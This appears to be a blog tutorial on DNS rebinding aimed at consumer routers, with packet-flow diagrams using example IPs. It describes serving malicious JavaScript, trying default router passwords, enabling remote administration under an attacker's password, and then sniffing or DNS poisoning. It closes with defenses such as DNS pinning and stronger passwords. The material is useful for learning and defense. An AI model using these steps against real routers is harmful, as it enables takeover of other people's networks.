Today we will get to know about DNS Rebinding - Hacking Routers and Taking Names
What is DNS Rebinding?
- DNS rebinding occurs when a web server provides an IP that is different than its own, generally for potentially malicious reasons.
- The attack vector is providing the IP of the client in order to perform Cross Site Request Forgery attack
- We will be using this to 'hack' routers
- This works because somewhere between some and many consumer-grade routers are configured in such a way that, when you type the external IP address of the router from within the local LAN, it will take you to the router configuration page
- The reason this works is because the router checks only where the packet is going, and not the interface through which it came in
- HThis means that an internal host can access the router by the router's INTERNAL or EXTERNAL IP.
- owever, an external device can not access the router at all (without DNS rebinding or some sort of attack).
Here's how it works ?
Let's see how it works with example ⇒
Suppose ⇒
Home User: [1.1.1.1](javascript:void(0))
Web Server: [3.3.3.3](javascript:void(0)) (example.com)
RealNameServer: [8.8.8.8](javascript:void(0))
FakeNameServer: [3.3.3.3](javascript:void(0)) (same as web server)
When a browser sends a request to a DNS server requesting the IP address of that server, the DNS server sends back all DNS records it has.
[1.1.1.1](javascript:void(0)) Me ---> RealNameServer ::: A Record for example.com
[1.1.1.1](javascript:void(0)) Me <--- RealNameServer ::: IPs For example.com: [3.3.3.3](javascript:void(0))
Then the well-known TCP handshake:
[1.1.1.1](javascript:void(0)) Me --SYN--> WebServer [3.3.3.3](javascript:void(0))
[1.1.1.1](javascript:void(0)) Me <--SYN/ACK-- WebServer [3.3.3.3](javascript:void(0))
[1.1.1.1](javascript:void(0)) Me --ACK--> WebServer [3.3.3.3](javascript:void(0))
[1.1.1.1](javascript:void(0)) Me <--HTML/JS-- WebServer [3.3.3.3](javascript:void(0))
[1.1.1.1](javascript:void(0)) Me --FIN--> WebServer [3.3.3.3](javascript:void(0))
[1.1.1.1](javascript:void(0)) Me <--FIN/ACK-- WebServer [3.3.3.3](javascript:void(0))
[1.1.1.1](javascript:void(0)) Me --ACK--> WebServer [3.3.3.3](javascript:void(0))
That's it! That's the absolute most basic form of a web request.
Okay, so DNS rebinding simply works like this:
Registered Nameserver: ns1.example.com [NS]
When we request an A record for the website, it provides two IP addresses.
www.example.com [A] -~-~-~-> [3.3.3.3](javascript:void(0)) , [1.1.1.1](javascript:void(0))
Set your nameserver to ns1.example.com in your registrar.
Now that you have that set up, we're ready to begin.
When the client requests your website, it will be provided with two different IP addresses: that of your web server, and that of their router
When they connect to you, you provide them with malicious HTML/JavaScript to automatically create requests to log into their router and perform your desired configuration changes.
[1.1.1.1](javascript:void(0)) Me ---> FakeNameServer ::: A Record for example.com
[1.1.1.1](javascript:void(0)) Me <--- FakeNameServer ::: IPs for example.com : [3.3.3.3](javascript:void(0)) and [1.1.1.1](javascript:void(0))
As you can see, it adds whatever source address the request is coming from and says "use this as an IP"
1.1.1.1 Me --SYN--> WebServer 3.3.3.3
1.1.1.1 Me <--SYN/ACK-- WebServer 3.3.3.3
1.1.1.1 Me --ACK--> WebServer 3.3.3.3
1.1.1.1 Me <--HTML/JS-- WebServer 3.3.3.3 *** This is MALICIOUS JAVASCTIPT
1.1.1.1 Me --FIN--> WebServer 3.3.3.3
1.1.1.1 Me <--RST-- WebServer 3.3.3.3
1.1.1.1 Me NEW IP ADDRESS FOR example.com: 1.1.1.1
1.1.1.1 Me --SYN--> Router 1.1.1.1
1.1.1.1 Me <--SYN/ACK-- Router 1.1.1.1
1.1.1.1 Me --ACK--> Router 1.1.1.1
1.1.1.1 Me <--HTML/JS-- Router 1.1.1.1 *** This is the Router Login Page
1.1.1.1 Me --FIN--> Router 1.1.1.1
1.1.1.1 Me <--FIN/ACK-- Router 1.1.1.1
1.1.1.1 Me --ACK--> Router 1.1.1.1
3.3.3.3 Malicious Webserver >>> Proxy via the Malicious Javascript >>> Router 1.1.1.1
Now the owner of the malicious web server has access to the router log in page for as long as the browser is open.
The key behind the effectiveness of DNS rebinding is that many routers have default passwords that users do not change
(ie: admin/admin, admin/password, root/, admin/, etc...).
Once you're in the router, enable remote administration (if accessible) and set a password (that you know) and you will be able to remote into the router.
From there, you can run the same attack over and over, sniffing the network, DNS cache poisoning, or other network attacks.
Blocking This Attack ⇒
1. Router Config:
This attack has been mainly stopped or prevented by more secure router configurations.
What allows this to work is the fact that services (like the HTTP server on your router) are bound to all interfaces and therefore are accessible by all IP's that it has.
It will drop anything coming in the external port, but that doesn't matter because it is accessing the external IP from the internal LAN.
2. DNS Pinning:
DNS Pinning basically takes the first DNS response of a site and keeps it.
It doesn't allow for updates... T his is depreciated because DNS load balancing
is vitally important to major sites, and it interferes with that.
However, some sort of verification may be implemented to ensure that each site within a multi-answer DNS response is apart of that domain.
3. Simple Security Measure
Change your fugging password
Prioritize HTTPS. Using certificates will allow you to find out whether a secure connection is actually in existence.